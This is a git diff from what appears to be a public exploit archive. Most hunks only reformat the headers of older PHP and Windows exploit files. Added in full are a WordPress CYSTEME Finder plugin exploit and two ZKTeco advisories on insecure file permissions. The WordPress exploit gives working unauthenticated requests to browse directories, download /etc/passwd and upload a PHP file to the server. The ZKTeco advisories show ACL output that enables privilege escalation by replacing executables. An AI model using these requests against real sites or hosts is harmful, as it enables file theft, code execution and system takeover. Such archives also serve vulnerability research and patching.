+++ b/platforms/php/webapps/2114.htm
@@ -1,4 +1,4 @@
-                        TinyPHPForum 3.6 Admin Maker<br>
+TinyPHPForum 3.6 Admin Maker<br>
 By SirDarckCat from elhacker.net
 
 <FORM method=post enctype="multipart/form-data">
diff --git a/platforms/php/webapps/2116.txt b/platforms/php/webapps/2116.txt
index 42866919e..cad8d7d38 100755
--- a/platforms/php/webapps/2116.txt
+++ b/platforms/php/webapps/2116.txt
@@ -1,4 +1,4 @@
-                        Script: TSEP <= 0.942
+Script: TSEP <= 0.942
 URL:  www.tsep.info
 Discovered: beford <xbefordx gmail com>
 Comments: "register_globals" must be enabled duh.
diff --git a/platforms/php/webapps/2117.php b/platforms/php/webapps/2117.php
index eb44bae89..490551388 100755
--- a/platforms/php/webapps/2117.php
+++ b/platforms/php/webapps/2117.php
@@ -1,4 +1,4 @@
-                        #!/usr/bin/php -q -d short_open_tag=on
+#!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "SendCard <= 3.4.0 unauthorized administrative access / remote commands\n";
 echo "execution exploit\n";
diff --git a/platforms/php/webapps/2118.php b/platforms/php/webapps/2118.php
index 04abb6b94..486f21bb1 100755
--- a/platforms/php/webapps/2118.php
+++ b/platforms/php/webapps/2118.php
@@ -1,4 +1,4 @@
-                        #!/usr/bin/php -q -d short_open_tag=on
+#!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n";
 echo "administrative credentials disclosure exploit\n";
diff --git a/platforms/php/webapps/2123.txt b/platforms/php/webapps/2123.txt
index 484968401..6c73a2058 100755
--- a/platforms/php/webapps/2123.txt
+++ b/platforms/php/webapps/2123.txt
@@ -1,4 +1,4 @@
-                        SQLiteWebAdmin
+SQLiteWebAdmin
 http://sourceforge.net/projects/sqlitewebadmin
 
 SQLiteWebAdmin is a simple PHP program for administrating
diff --git a/platforms/php/webapps/2128.txt b/platforms/php/webapps/2128.txt
index 88f8609d0..a5c11cf20 100755
--- a/platforms/php/webapps/2128.txt
+++ b/platforms/php/webapps/2128.txt
@@ -1,4 +1,4 @@
-                        $$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
+$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
 $$
 $$  SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability
 $$  Script site: http://sapid.sourceforge.net/
diff --git a/platforms/php/webapps/37389.txt b/platforms/php/webapps/37389.txt
index 2bb04f7cf..c8e7975ae 100755
--- a/platforms/php/webapps/37389.txt
+++ b/platforms/php/webapps/37389.txt
@@ -1,4 +1,4 @@
-            # Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
+# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
 # Google Dork:
 # Date: 25/06/2015
 # Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
diff --git a/platforms/php/webapps/40295.txt b/platforms/php/webapps/40295.txt
new file mode 100755
index 000000000..2e4b245c7
--- /dev/null
+++ b/platforms/php/webapps/40295.txt
@@ -0,0 +1,119 @@
+Exploit Title: WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
+Link: https://wordpress.org/plugins/cysteme-finder/
+Version: 1.3
+Date: August 23rd 2016
+Exploit Author: T0w3ntum
+Author Website: t0w3ntum.com
+
+### SUMMARY
+
+CYSTEME Finder is an admin file manager plugin for wordpress that fails to check cookie data in the request 
+to http://server/wp-content/plugins/cysteme-finder/php/connector.php 
+
+This allows attackers to upload, download, and browse the remote file system. 
+
+### LFI
+
+- Retrieve all data in the root wordpress directory. This will return JSON. 
+Exploit: 
+http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1
+
+Reply:
+{
+  "cwd": {
+    "mime": "directory",
+    "ts": 1471999484,
+    "read": 1,
+    "write": 1,
+    "size": 0,
+    "hash": "l1_Lw",
+    "volumeid": "l1_",
+    "name": "Fichiers du site",
+    "date": "Today 20:44",
+    "locked": 1,
+    "dirs": 1
+  },
+  "options": {
+    "path": "Fichiers du site",
+    "url": null,
+    "tmbUrl": "",
+    "disabled": [
+      
+    ],
+    "separator": "\/",
+    "copyOverwrite": 1,
+    "archivers": {
+      "create": [
+        "application\/x-tar",
+        "application\/x-gzip",
+        "application\/x-bzip2"
+      ],
+      "extract": [
+        "application\/x-tar",
+        "application\/x-gzip",
+        "application\/x-bzip2",
+        "application\/zip"
+      ]
+    }
+  },
+  "files": [
+    {
+      "mime": "directory",
+      "ts": 1471999484,
+      "read": 1,
+      "write": 1,
+      "size": 0,
+      "hash": "l1_Lw",
+      "volumeid": "l1_",
+      "name": "Fichiers du site",
+      "date": "Today 20:44",
+      "locked": 1,
+      "dirs": 1
+    },
+    {
+      "mime": "text\/plain",
+      "ts": 1471714510,
+      "read": 1,
+      "write": 1,
+      "size": 813,
+      "hash": "l1_Lmh0YWNjZXNz",
+      "name": ".htaccess",
+      "phash": "l1_Lw",
+      "date": "20 Aug 2016 13:35"
+    },
+
+Simply replacing wphome with any other directory path will return file information for that directory. 
+If you want to download that file, get the hash value for the file and include it in the following request:
+ 
+Will download /etc/passwd
+http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1
+
+### File Upload
+
+As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following. 
+
+POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1
+Host: http://server
+Content-Length: 314
+Origin: http://server
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
+Content-Type: multipart/form-data; boundary=--------723608748
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Connection: close
+
+----------723608748
+Content-Disposition: form-data; name="cmd"
+
+upload
+----------723608748
+Content-Disposition: form-data; name="target"
+
+l1_Lw
+----------723608748
+Content-Disposition: form-data; name="upload[]"; filename="test.php"
+Content-Type: text/html
+
+<?php phpinfo(); ?>
+----------723608748--
\ No newline at end of file
diff --git a/platforms/windows/dos/2039.pl b/platforms/windows/dos/2039.pl
index 5912f7b73..e67673948 100755
--- a/platforms/windows/dos/2039.pl
+++ b/platforms/windows/dos/2039.pl
@@ -1,4 +1,4 @@
-                        #!/usr/bin/perl
+#!/usr/bin/perl
 # Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
 # ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
 #
diff --git a/platforms/windows/local/2094.c b/platforms/windows/local/2094.c
index e3c09531f..c63feef9c 100755
--- a/platforms/windows/local/2094.c
+++ b/platforms/windows/local/2094.c
@@ -1,4 +1,4 @@
-                        /*
+/*
 
 by Luigi Auriemma
 
diff --git a/platforms/windows/local/40322.txt b/platforms/windows/local/40322.txt
new file mode 100755
index 000000000..fea36d8a9
--- /dev/null
+++ b/platforms/windows/local/40322.txt
@@ -0,0 +1,112 @@
+ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions
+
+
+Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
+Product web page: http://www.zkteco.com
+Affected version: 3.0.1.6
+                  3.0.1.5 (160622)
+                  3.0.1.1 (160216)
+
+Summary: ZKTime.Net V3.0 is a new generation time attendance
+management software. Meanwhile, it integrates with time attendance
+and access control system. Some frequently used functions such as
+attendance reports, device management and employee management can
+be managed directly on the home page which providing excellent user
+experience. Owing to the Pay code function, it can generate both
+time attendance records and corresponding payroll in the software
+and easy to merge with the most ERP and Payroll software, which can
+rapidly upgrade your working efficiency. The brand new flat GUI design
+and humanized structure will make your daily management more pleasant
+and convenient.
+
+Desc: ZKTime.Net suffers from an elevation of privileges vulnerability
+which can be used by a simple user that can change the executable file
+with a binary of choice. The vulnerability exist due to the improper
+permissions, with the 'C' flag (Change) for 'Everyone' group, making the
+entire directory 'ZKTimeNet3.0' and its files and sub-dirs world-writable.
+
+Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
+           Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5360
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5360.php
+
+
+18.07.2016
+
+--
+
+
+C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0"
+c:\Program Files (x86)\ZKTimeNet3.0
+                Everyone                  Change [RWXD]
+                NT SERVICE\TrustedInstaller Special Access [A]
+                NT AUTHORITY\SYSTEM       Special Access [A]
+                BUILTIN\Administrators    Special Access [A]
+                BUILTIN\Users             Special Access [RX]
+                CREATOR OWNER             Special Access [A]
+
+
+C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe"
+c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe
+                Everyone                  Change [RWXD]
+
+
+
+C:\Program Files (x86)>cacls ZKTimeNet3.0
+C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
+                                    NT SERVICE\TrustedInstaller:(ID)F
+                                    NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
+                                    NT AUTHORITY\SYSTEM:(ID)F
+                                    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
+                                    BUILTIN\Administrators:(ID)F
+                                    BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
+                                    BUILTIN\Users:(ID)R
+                                    BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
+                                                                  GENERIC_READ
+                                                                  GENERIC_EXECUTE
+
+                                    CREATOR OWNER:(OI)(CI)(IO)(ID)F
+
+
+C:\Program Files (x86)\ZKTimeNet3.0>cacls *.exe
+C:\Program Files (x86)\ZKTimeNet3.0\LanguageTranslate.exe Everyone:C
+                                                          Everyone:(ID)C
+                                                          NT AUTHORITY\SYSTEM:(ID)F
+                                                          BUILTIN\Administrators:(ID)F
+                                                          BUILTIN\Users:(ID)R
+
+C:\Program Files (x86)\ZKTimeNet3.0\unins000.exe Everyone:(ID)C
+                                                 NT AUTHORITY\SYSTEM:(ID)F
+                                                 BUILTIN\Administrators:(ID)F
+                                                 BUILTIN\Users:(ID)R
+
+C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.DBTT.exe Everyone:C
+                                                       Everyone:(ID)C
+                                                       NT AUTHORITY\SYSTEM:(ID)F
+                                                       BUILTIN\Administrators:(ID)F
+                                                       BUILTIN\Users:(ID)R
+
+C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
+                                                  Everyone:(ID)C
+                                                  NT AUTHORITY\SYSTEM:(ID)F
+                                                  BUILTIN\Administrators:(ID)F
+                                                  BUILTIN\Users:(ID)R
+
+C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.Update.exe Everyone:C
+                                                         Everyone:(ID)C
+                                                         NT AUTHORITY\SYSTEM:(ID)F
+                                                         BUILTIN\Administrators:(ID)F
+                                                         BUILTIN\Users:(ID)R
+
+C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.ZKTime5DB.exe Everyone:C
+                                                            Everyone:(ID)C
+                                                            NT AUTHORITY\SYSTEM:(ID)F
+                                                            BUILTIN\Administrators:(ID)F
+                                                            BUILTIN\Users:(ID)R
+
diff --git a/platforms/windows/local/40323.txt b/platforms/windows/local/40323.txt
new file mode 100755
index 000000000..8147cc763
--- /dev/null
+++ b/platforms/windows/local/40323.txt
@@ -0,0 +1,49 @@
+ZKTeco ZKAccess Professional 3.5.3 Insecure File Permissions
+
+
+Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
+Product web page: http://www.zkteco.com
+Affected version: 3.5.3 (Build 0005)
+
+Summary: ZKAccess 3.5 is a desktop software which is suitable
+for small and medium businesses application. Compatible with
+all ZKAccess standalone reader controllers, the software can
+simultaneously manage access control and generate attendance
+report. The brand new flat GUI design and humanized structure
+of new ZKAccess 3.5 will make your daily management more pleasant
+and convenient.
+
+Desc: ZKAccess suffers from an elevation of privileges vulnerability
+which can be used by a simple authenticated user that can change the
+executable file with a binary of choice. The vulnerability exist due
+to the improper permissions, with the 'M' flag (Modify) for 'Authenticated Users'
+group.
+
+
+Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
+           Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5361
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php
+
+
+18.07.2016
+
+--
+
+
+C:\ZKTeco>icacls ZKAccess3.5
+ZKAccess3.5 BUILTIN\Administrators:(I)(F)
+            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+            NT AUTHORITY\SYSTEM:(I)(F)
+            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+            BUILTIN\Users:(I)(OI)(CI)(RX)
+            NT AUTHORITY\Authenticated Users:(I)(M)
+            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
+
+Successfully processed 1 files; Failed processing 0 files